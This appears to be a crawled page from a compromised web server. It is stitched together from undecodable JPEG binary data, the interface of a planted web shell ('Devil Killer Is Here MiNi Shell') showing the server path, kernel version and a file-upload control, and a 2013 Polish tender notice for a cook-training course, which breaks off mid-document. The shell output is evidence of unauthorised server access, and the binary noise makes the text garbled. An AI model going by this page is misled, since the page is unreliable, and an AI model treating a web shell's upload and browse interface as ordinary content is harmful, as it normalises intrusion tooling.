JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130301/84096-N-2013.html

<p class="kh_header"><b>Nowy Sącz: KUCHARZ MAŁEJ GASTRONOMII. Nr postępowania: DOR-271-9/13</b><br>
<b>Numer ogłoszenia: 84096 - 2013; data zamieszczenia: 01.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy dla Powiatu Nowosądeckiego , ul. Nawojowska 118, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4400808, faks 018 4400808.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.powiat-ns.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KUCHARZ MAŁEJ GASTRONOMII. Nr postępowania: DOR-271-9/13.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Cel i czas realizacji szkolenia 
1. Zorganizowanie i przeprowadzenie szkolenia  dla 18 osób bezrobotnych w ramach projektu  pn.: Twoja decyzja - nasza pomoc współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki,  Priorytet VII  Działanie 7.2  Poddziałanie 7.2.1. 
2. Celem szkolenia  jest nabycie  przez kursantów wiedzy teoretycznej i umiejętności  praktycznych niezbędnych do pracy na stanowisku kucharza małej gastronomii z odpowiednimi kwalifikacjami zawodowymi.
3. Czas trwania szkolenia wynosi: 34 dni  robocze  licząc od daty rozpoczęcia szkolenia,  w tym egzamin wewnętrzny przeprowadzony przez komisję powołaną przez Wykonawcę, który powinien odbyć się w przedostatnim dniu szkolenia. Ostatni dzień szkolenia przeznaczony jest na zakończenie szkolenia.
4. Zamawiający wymaga, aby liczba godzin szkoleniowych w każdym dniu szkolenia wynosiła 6 godzin zegarowych, z wyjątkiem  warsztatów z psychologiem (3 dni po 5 godzin zegarowych).
5. Intensywność zajęć: codziennie w dni robocze od poniedziałku do piątku, przeciętnie nie mniej niż  25 godzin zegarowych w tygodniu.
6. Zajęcia teoretyczno -zawodowe i warsztatowe  nie mogą trwać dłużej niż do godz. 1600, natomiast  zajęcia praktyczne w placówkach gastronomicznych nie dłużej niż do godziny 2000.
7. Planowany termin rozpoczęcia szkolenia: do 7 dni od podpisania umowy.
8. Na wypadek gdyby osoby przeznaczone do programu szkolenia, z przyczyn,  na które Zamawiający nie ponosi odpowiedzialności zrezygnowały z udziału w szkoleniu przed datą zawarcia umowy, Zamawiający zastrzega sobie prawo do zawarcia umowy  dla  mniejszej ilości osób bez poniesienia skutków finansowych z tego tytułu.

II. Zakres tematyczny  szkolenia
1. Liczba godzin szkoleniowych dla każdego uczestnika szkolenia wynosi: 189 godzin zegarowych, w tym:
1.1.  Moduł  I - warsztaty z psychologiem obejmujące  15 godzin  zegarowych  (3 dni po 5 godz.),
1.2. Moduł II - zajęcia  teoretyczno - zawodowe na stanowisku kucharza małej gastronomii - 24 godziny  zegarowe,
1.3. Moduł III - organizowanie imprez okolicznościowych (catering) - 12 godzin  zegarowych zajęć  teoretyczno - zawodowych,
1.4.  Moduł IV -  carving - rzeźbienie   w owocach i warzywach - 18 godzin zajęć  warsztatowych,  1.5. Moduł V - obsługa kasy fiskalnej - 18 godzin zegarowych zajęć warsztatowych, 
1.6. Moduł  VI - obsługa konsumenta przez pracownika gastronomii - 18 godzin zegarowych zajęć teoretyczno - zawodowych i warsztatowych, 
1.7.  Moduł VII - zajęcia  praktyczne w zakładach gastronomicznych, stołówkach, restauracjach, firmach cateringowych, które potencjalnie mogą zatrudnić absolwentów szkolenia - 84 godziny zegarowe.
2. Zamawiający wymaga, aby   warsztaty z psychologiem realizowane były jako pierwsze,  a Moduł VII (zajęcia praktyczne) jako ostatnie.
III. Miejsce realizacji szkolenia
1. W przypadku realizacji zajęć na terenie Powiatu Nowosądeckiego Wykonawca zabezpieczy we własnym zakresie dojazd uczestników szkolenia z Nowego Sącza do Ośrodka Szkoleniowego oraz powrót do Nowego Sącza w każdym dniu szkolenia. 
2. W przypadku realizacji zajęć szkoleniowych z zakwaterowaniem  poza Nowym Sączem lub Powiatem Nowosądeckim Wykonawca we własnym zakresie zapewni:
a) Dojazd wszystkim uczestnikom szkolenia z Nowego Sącza do Ośrodka Szkoleniowego i z Ośrodka Szkoleniowego do Nowego Sącza. Przewidywany transport powinien obejmować dojazd  w poniedziałek rano i powrót w piątek po zajęciach w każdym tygodniu zajęć. Maksymalny czas dojazdu na szkolenie z Nowego Sącza do miejsca odbywania zajęć oraz powrót z miejsca odbywania zajęć do Nowego Sącza  nie powinien przekraczać 3 godzin zegarowych.
b) Codzienny dojazd uczestników szkolenia z miejsca zakwaterowania do miejsca odbywania zajęć w sytuacji, gdy miejsce zakwaterowania uczestników będzie inne niż miejsce odbywania zajęć.
c) Pełne wyżywienie oraz zakwaterowanie wszystkim uczestnikom szkolenia.
IV. Dokumenty i oświadczenia, które Wykonawca jest zobowiązany przedłożyć   Zamawiającemu do  zatwierdzenia najpóźniej na trzy dni przed podpisaniem umowy:
1. Program szkolenia (załącznik nr 2 do Umowy), który  powinien być opracowany zgodnie z rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia  usług rynku pracy (Dz. U. z 2010r. Nr 177 poz. 1193 z późn. zm.) i zawierać co najmniej następujące zagadnienia:
a) nazwę i zakres  szkolenia,
b) czas trwania i sposób organizacji szkolenia,
c) wymagania wstępne dla uczestników szkolenia,
d) cele  szkolenia,
e) plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i  części praktycznej,
f) opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
g) wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
h) sposób sprawdzenia efektów szkolenia - przewidziane sprawdziany i egzaminy.
2. Harmonogram zajęć szkoleniowych (załącznik nr 3 do Umowy), który powinien zawierać:
a) datę (poszczególne dni szkolenia),
b) czas trwania zajęć (od godz. do godz.; z podziałem na grupy - dot. Modułu  V), 
c) liczbę godzin  zegarowych,
d) tematykę zajęć,  
e) miejsce realizacji szkolenia,
f) imię i nazwisko osoby prowadzącej zajęcia w każdym dniu szkolenia, 
g) ilość godzin w danym miesiącu.
3. Kserokopię Akredytacji Kuratorium  Oświaty zgodnej z przedmiotem zamówienia w przypadku posiadania stosownego dokumentu.
4. Kserokopię Certyfikatu Jakości Usług ISO w przypadku posiadania stosownego dokumentu.
5. Kserokopię dokumentów potwierdzających kwalifikacje kadry dydaktycznej (świadectwa/dyplomy ukończenia szkoły), która będzie uczestniczyć w prowadzeniu zajęć szkoleniowych w poszczególnych modułach, potwierdzone za zgodność  z oryginałem.
6. Oświadczenie Wykonawcy o posiadaniu przez osoby/osobę wskazane/wskazaną do realizacji szkolenia doświadczenia zawodowego oraz doświadczenia  w realizacji określonej liczby szkoleń  zgodnie  z wymogami  zawartymi w Specyfikacji Istotnych Warunków Zamówienia.
7. Wskazanie koordynatora organizacyjnego  odpowiedzialnego za nadzór wewnętrzny nad zamówieniem  (imię i nazwisko  koordynatora, stanowisko, telefon kontaktowy, fax, e- mail).
Osoba/y te będą odpowiedzialne  za opiekę  i kontakt  z uczestnikami  szkolenia  oraz za prawidłową realizację zawartej umowy i  bezpośredni kontakt z Zamawiającym.  
Należy uwzględnić wynagrodzenie dla tej osoby/osób w kosztach szkolenia.
8.  Wzór zaświadczeń  i certyfikatu potwierdzających ukończenie szkolenia.
9.  Wzór ankiety dla absolwentów  szkolenia służącej do oceny szkolenia.
10. Ewentualnie dokumenty potwierdzające upoważnienie do reprezentowania osoby  do podpisania umowy. 
V. Pozostałe warunki  realizacji przedmiotu zamówienia:
1. Wykonawca w dniu rozpoczęcia szkolenia przekaże wszystkim uczestnikom szkolenia harmonogram zajęć szkoleniowych oraz zapozna uczestników szkolenia z programem szkolenia.
2. Wykonawca przedstawi Zamawiającemu  do zatwierdzenia  szczegółowy harmonogram zajęć praktycznych (załącznik nr 4 do Umowy)  najpóźniej na trzy dni przed rozpoczęciem zajęć praktycznych, zawierający:
a) datę (poszczególne dni zajęć praktycznych),
b) czas trwania zajęć praktycznych (od godz. do godz.),
c) liczbę godzin  zegarowych,
d)  wykaz osób odbywających praktykę w danym miejscu,
e)  tematykę zajęć,
f)  miejsce realizacji zajęć praktycznych (dokładny adres), 
g) imiona i nazwiska opiekunów stanowiskowych w poszczególnych miejscach praktyk.
3. Program szkolenia powinien:	
a) gwarantować uczestnikom szkolenia solidne i profesjonalne przygotowanie do testów/egzaminów  i do wykonywania pracy w zawodzie:  kucharz małej gastronomii, 
b) uwzględniać zróżnicowany poziom umiejętności i wiedzy uczestników szkolenia,
c)  wykorzystywać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne na stronie internetowej www.standardyiszkolenia.praca.gov.pl oraz być zgodny z  wymogami określonymi w rozporządzeniu MEN z dnia 11.01.2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 17.02.2012, poz. 186).
4. Program szkolenia powinien obejmować następujące moduły tematyczne:
4.1. Moduł I -  warsztaty z psychologiem obejmujący  15 godzin  zegarowych  (3 dni po 5 godz.) zawierający  takie zagadnienia jak:
a) stres i samoocena,
b) asertywność i samopoznanie, 
c) motywacja i automotywacja,
d) pozytywne myślenie.

Zamawiający wymaga, aby zajęcia szkoleniowe  w  I  module poprowadziła  osoba/y posiadająca/e  co najmniej wykształcenie wyższe kierunkowe -  psychologia  oraz  prowadziła/li   co najmniej 3 warsztaty o tożsamej tematyce zawartej   w module.
4.2. Moduł II -  zajęcia teoretyczno - zawodowe  niezbędne w pracy na stanowisku:  kucharz małej gastronomii, obejmujący 24 godziny zegarowe, zawierający  co najmniej następujące zagadnienia teoretyczno-zawodowe:
a) podstawowe normy i przepisy obowiązujące w gospodarce żywnościowej,
b) charakterystyka pracy w placówkach gastronomicznych,
c) organizacja stanowiska i miejsca  pracy  zgodnie z zasadami BHP, czynności porządkowe w kuchni,
d) wizerunek zawodowy kucharza, zasady komunikacji zawodowej, współpraca w zespole,
e) przestrzeganie przepisów sanitarnych BHP i ppoż. oraz sanitarno-epidemiologicznych   obowiązujących w zakładach żywienia zbiorowego,
f)  receptury gastronomiczne - przepisy kulinarne,
g) obsługa narzędzi, maszyn i urządzeń, które stanowią wyposażenie placówek gastronomicznych,
h) stosowanie zasad prawidłowego żywienia,
i) charakterystyka procesów technologicznych,
j) planowanie i organizowanie pracy własnej i innych,
k) zestawianie potraw w posiłki - śniadanie, obiad, kolacja,
l) planowanie posiłków  i układanie prostego  menu  w małej gastronomii,
m) dokonywanie oceny jakościowej surowców, półproduktów i gotowych potraw,
n) trendy w zakresie sporządzania receptur potraw i posługiwanie się nimi podczas wykonywania potraw,
o) zastosowanie nowoczesnych form przygotowania potraw dla obniżenia ich kosztów tworzenia,
p) kultura osobista i etyka zawodowa na stanowisku kucharza małej gastronomii,
r) prawa konsumenta i klienta.

Zamawiający wymaga, aby osoba/y prowadząca/e MODUŁ II posiadała/y:  wykształcenie wyższe zawodowe lub magisterskie lub podyplomowe kierunkowe  zgodne z tematyką szkolenia  oraz prowadziła/y co najmniej 5 szkoleń o tożsamej tematyce zawartej w module.
	
4.3. Moduł III - teoretyczno - zawodowy z zakresu cateringu obejmujący 12 godzin zegarowych, zawierający co najmniej  następujące zagadnienia:
a) organizacja usługi cateringowej zgodnie z przepisami i zasadami bezpieczeństwa i higieny pracy,
(przepisy prawa dotyczące prowadzenia zakładów zbiorowego żywienia),
b) charakterystykę cateringu jako gałęzi usług gastronomicznych - zakładanie placówki gastronomicznej, otwarcie własnej działalności gospodarczej, 
c) marketing i reklama, konkurencyjność i profesjonalizm jako element usług cateringowych,
d) savoir - vivre, elementy autoprezentacji w kontakcie z klientem,
e) organizacja, planowanie i przeprowadzenie usług cateringowych w tym m.in.: bankietów, konferencji, szkoleń, imprez okolicznościowych, wesel, komunii, imprez plenerowych, firmowych,
f) aranżacje i prezentacje potraw,
g) projektowanie i organizacja imprez,
h) opracowywanie cen i kosztorysów usług cateringowych oraz ich rozliczanie,
i) monitorowanie realizowanej usługi cateringowej,
j) współpraca z innymi branżami w wykonaniu usług cateringowych,
k) zasady  sporządzania  dań zasadniczych, przechowywanie, wydawanie i dystrybucja potraw,
l) dobór napojów alkoholowych  do potraw, zasady sporządzania  i serwowania napojów zimnych,
m) zasady przewozu wyrobów kulinarnych,
n) wyposażenie firmy  cateringowej,
o) promocja usług cateringowych,
p)  pomysły  na rozwijanie i usprawnienie oferty,
r) etyka  i kultura zawodowa.    

Zamawiający wymaga, aby osoba/y prowadząca/e  MODUŁ III posiadała/y:  wykształcenie co najmniej średnie gastronomiczne,  minimum 3 lata stażu pracy w firmie cateringowej przy organizacji przyjęć  oraz prowadziła/y co najmniej 3 szkolenia  o tożsamej tematyce zawartej w module. 

4.4. Moduł IV -  carving - zajęcia warsztatowe z  rzeźbienia  w owocach i warzywach - obejmujący 18 godzin  zegarowych, który powinien  zawierać co najmniej:
a) narzędzia do carvingu:  typy, rodzaje, sposoby używania i konserwacji, sposoby zabezpieczania i pielęgnacji wyrzeźbionych prac, 
b) podstawowe techniki stosowane przy przygotowywaniu dekoracji z warzyw i owoców,
c) rzeźbienie w warzywach  i owocach - carving,
d) zajęcia  warsztatowe  z  tworzenia  dekoracji sztuki carvingu  poprzez łączenie pojedynczych rzeźb (tworzenie kompozycji przestrzennej).

W celu realizacji części warsztatowej, Wykonawca zapewni każdemu uczestnikowi szkolenia indywidualne stanowisko pracy oraz wskazane poniżej   produkty w odpowiedniej ilości tj.:
- akcesoria do carvingu -  deski do krojenia, nożyki, wycinarki do spirali, nożyki do wycinania rowków, łyżki do wycinania kulek, dłutka, wykałaczki, miski,
- niezbędne owoce i warzywa do przygotowania   dekoracji  potraw - carving  o odpowiedniej jakości  i ilości zapewniającej  solidną naukę.
Zamawiający wymaga, aby podczas odbywania zajęć  z Modułu IV Wykonawca zapewnił  dla każdego uczestnika   kolorowy  fartuch  kuchenny, który przejdzie  na własność kursanta za potwierdzeniem odbioru (potwierdzenie z datą odbioru).

Zamawiający wymaga, aby osoba/y prowadząca/e  MODUŁ IV posiadała/y:  wykształcenie co najmniej średnie,   minimum 3 lata doświadczenia zawodowego związanego z tematyką  zawartą w module  oraz prowadziła/y co najmniej 3  szkolenia  o  tematyce zawartej w module	

4.5. Moduł V -  obsługa kasy fiskalnej obejmujący 18 godzin zegarowych,  który powinien zawierać następujące zagadnienia:
a) budowa oraz rodzaje stosowanych kas fiskalnych,
b) programowanie kas fiskalnych,
c) praktyczna obsługa urządzeń fiskalnych (paragon, raport dobowy i raport okresowy),
d) błędy obsługi kasy fiskalnej  i sposoby ich rozwiązywania, 
e) wymiana rolki  papieru.
Zamawiający wymaga, aby Wykonawca zapewnił  podczas zajęć z obsługi  kasy fiskalnej możliwość nabycia praktycznych umiejętności z obsługi czytników kart płatniczych (opis rynku kart płatniczych i zasady działania kart płatniczych, rodzaje transakcji kartami płatniczymi, zabezpieczanie kart i procedury weryfikacyjne, wykonywanie transakcji kartami płatniczymi, budowa terminala/PINpada).

Zamawiający wymaga, aby osoby prowadzące Moduł V (co najmniej 2 z uwagi na podział kursantów na dwie grupy) posiadały co najmniej wykształcenie średnie oraz ukończone szkolenia z zakresu obsługi i programowania kas fiskalnych potwierdzone odpowiednim zaświadczeniem oraz prowadziły co najmniej 5 szkoleń o tożsamej tematyce zawartej w module.

Każdy uczestnik winien mieć zapewniony indywidualny dostęp do  kasy fiskalnej na zasadzie 1 osoba - 1 stanowisko.

4.6. Moduł  VI - obsługa konsumenta przez pracownika gastronomii - 18 godzin zegarowych  zajęć teoretyczno-zawodowych i warsztatowych, który powinien zawierać co najmniej  następujące zagadnienia:
a) przestrzeganie zasad bhp, p.poż. w sali konsumenckiej
b) wykazywanie kultury osobistej  i przestrzeganie etyki zawodowej 
c) wyposażenie i obsługa sprzętu kelnerskiego w części konsumenckiej i ekspedycyjnej
d) przygotowanie poprzedzające obsługę
e) przygotowanie sali konsumenckiej, zasady nakrywania stołu
f) obsługiwanie w sali konsumenckiej (komunikacja sala - kuchnia)
g) noszenie zastawy (techniki noszenia talerzy, naczyń, tac)
h) serwowanie potraw, karty menu - waga znajomości karty menu i alkoholi, podawanie kart, doradzanie przy wyborze potraw, napojów itd.
i) wydawanie śniadań
j) przygotowanie potraw  w obecności konsumenta
k) serwowanie napojów alkoholowych
l) organizacja przyjęć okolicznościowych
m) postępowanie w przypadku reklamacji i zażaleń
n) zbieranie zastawy stołowej po konsumpcji
o) dobór alkoholu do potraw (otwieranie wina, temperatury podawania win, rodzaje kieliszków, podstawowa wiedza o winach)
p) ćwiczenia praktyczne z obsługi ekspresu ciśnieniowego (podstawowe wiadomości o kawie, rodzaje napojów kawowych)
r) obsługa gości przy stole, wystawianie rachunków. 
s) prawidłowe nakrycie stołu -  odpowiedni  dobór zastawy stołowej do różnych  potraw  i napojów, 
dekoracja  i nakrycie  stołu -   dobór kolorystyki  i stylu nakryć stołowych w zależności od rodzaju imprezy (motywu przewodniego ), kwiaty, świece itd.,
zasady zagospodarowania przestrzeni na stole,
nauka artystycznego  składania serwetek papierowych,  materiałowych, flizelinowych.

Wymagane jest, aby zajęcia z w/w  modułu miały charakter aktywny, wymagający zaangażowania wszystkich uczestników szkolenia. W trakcie przebiegu zajęć warsztatowych  powinny być wykorzystywane  wykłady, pokazy, prezentacje, ćwiczenia praktyczne - symulacja obsługi konsumenta przez pracownika gastronomii - obsługa kelnerska.
Zamawiający wymaga aby Wykonawca stworzył do w/w Modułu  symulacyjną   salę szkoleniową zaimprowizowaną  na  salę restauracyjną  z odpowiednim wyposażeniem.
Zamawiający wymaga, aby osoba/y prowadząca/e  MODUŁ  VI posiadała/y:  wykształcenie co najmniej zasadnicze zawodowe  kierunkowe,  minimum 3 lata doświadczenia zawodowego związanego z tematyką  zawartą w module oraz prowadziła/y co najmniej 3 szkolenia  o tożsamej tematyce zawartej w module. 

 W symulacyjnej sali restauracyjnej Wykonawca zapewni każdemu uczestnikowi szkolenia indywidualne stanowisko pracy oraz wskazane poniżej   produkty w odpowiedniej ilości tj.: 
- stoły, 
- obrusy (białe i kolorowe), skertingi - falbany do stołów bankietowych,
- kolorowe tiule, organze, satyny  do dekoracji  stołu,
- kolorowe serwetki papierowe -  minimum  3  paczki dla jednego uczestnika, 
- kolorowe  serwetki gastronomiczne ząbkowane,
- serwetki materiałowe (lniane, nakrochmalone, wyprasowane o wymiarze 40 x 40 cm) - minimum 5 szt.   dla uczestnika,
- serwetki flizelinowe -  minimum  2  paczki   dla uczestnika,
- kolorowe wstążki do  przewiązania serwetek, 
- tace  kelnerskie (np. okrągłe, prostokątne, antypoślizgowe) - minimum  1 szt.  dla uczestnika,
- zastawy obiadowe (tj. talerze: głębokie, płytkie, deserowe; bulionówki;  wazy na zupę; cukierniczki; przyprawniki, sosjerki, salaterki),
- zestaw sztućców (tj. łyżki, widelce, widelczyki do ciasta, noże, łyżeczki, nalewki),
- szklanki, filiżanki do kawy, herbaty, kieliszki na wino białe i  czerwone, szklanki na whisky,  szampanówki,  kieliszki na wódkę/likier,  klosze na ciasto, dzbanki,  patery i półmiski na zimną zastawę (lustro), termosy konferencyjne, podgrzewacz do potraw, 
- podkładki   papierowe pod filiżanki, ciasta (ażurowe),
- ozdoby na stół  np. konfetti,
- kompozycje  kwiatowe sztuczne i żywe,  wazony, lampiony, serwetniki, świeczniki i  świece, 
- ekspres  ciśnieniowy (kawa, mleko, szklanki do kawy latte i innej),
- otwieracz do wina/korkociąg tzw. TRYBUSZON,
- schładzacz do wina,
- wzorcowe karty menu,
- wózek kelnerski, 
- butelki z różnych alkoholi
oraz inne niezbędne narzędzia i produkty gwarantujące odpowiedni poziom szkolenia.
4.7. Moduł VII - praktyczny  - obejmujący  84  godziny zegarowe zajęć praktycznych w zakładach gastronomicznych, stołówkach, restauracjach, firmach cateringowych,  które potencjalnie mogą zatrudnić absolwentów szkolenia. 
Do każdej placówki gastronomicznej powinny być przydzielone  nie więcej niż 2 osoby.	
Moduł  praktyczny powinien zawierać  następujące zagadnienia:
1) przygotowywanie stanowiska pracy zgodnie z wymogami bezpieczeństwa i higieny pracy,
2) przestrzeganie higieny osobistej i higieny produkcji,
3) porządkowanie stanowiska pracy,
4) techniki mycia naczyń i urządzeń kuchennych,
5) usuwanie odpadów,
6) pobieranie surowców i  półproduktów do produkcji kulinarnej,
7) zabezpieczenie surowców, półproduktów i wyrobów gotowych przed zepsuciem w/g instrukcji kuchennych,
8) prowadzenie obróbki wstępnej surowców - ręcznej, mechanicznej, termicznej w/g instrukcji kuchennych,
9) obróbka wstępna produktów -  mięs, warzyw, nabiału,
10) obróbka termiczna produktów,
11) przygotowywanie potraw gorących, zimnych, na wynos,
12) porcjowanie, dekoracja - carving,  wydawanie potraw, 
13) sporządzanie przystawek, przekąsek, zup, deserów,
14) sporządzanie dań wegetariańskich, 
15) sporządzanie dań mięsnych - wieprzowina, wołowina, drób,
16) sporządzanie mięs peklowanych, pieczonych,
17) sporządzanie potraw z ryb, 
18) sporządzanie potraw mlecznych,
19) wykonywanie surówek, sałatek jako potrawa samodzielna i dodatek do dań,
20) sporządzanie farszów, kremów, past,
21) sporządzanie zup i dodatków do zup,
22) sporządzanie potraw z kasz, mąki, ryżu,
23) sporządzanie prostych deserów i wyrobów z ciast cukierniczych na przyjęcia okolicznościowe,
24) sporządzanie napojów zimnych i gorących,
25) wykończanie, porcjowanie, dekorowanie i estetyczne wydawanie wykonanych potraw i napojów
26) posługiwanie  się narzędziami, maszynami i urządzeniami przy przygotowywaniu potraw                         i napojów,
27) obsługa klienta, obsługa kasy fiskalnej. 

Pracownie (kuchnie) do zajęć praktycznych, gdzie uczestnicy będą odbywać praktykę powinny być wyposażone w sprzęt gastronomiczny oraz spełniać wymagania sanitarno-epidemiologiczne. Wykonawca musi zapewnić odpowiednią ilość produktów żywnościowych   oraz  sprzęt, przybory gastronomiczne narzędzia i urządzenia gastronomiczne o stanie technicznym zapewniającym odpowiedni poziom kursu.
Każdy uczestnik szkolenia powinien mieć dostęp do samodzielnego stanowiska pracy.
Zamawiający wymaga, aby opiekunowie stanowiskowi w placówkach gastronomicznych posiadali wykształcenie:  co najmniej zasadnicze zawodowe i co najmniej 5 lat stażu pracy w zawodzie związanym z tematyką szkolenia zawartą w module. 
Szczegółowy opis przedmiotu zamówienia zawarto w załączniku nr 1 do specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 34.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
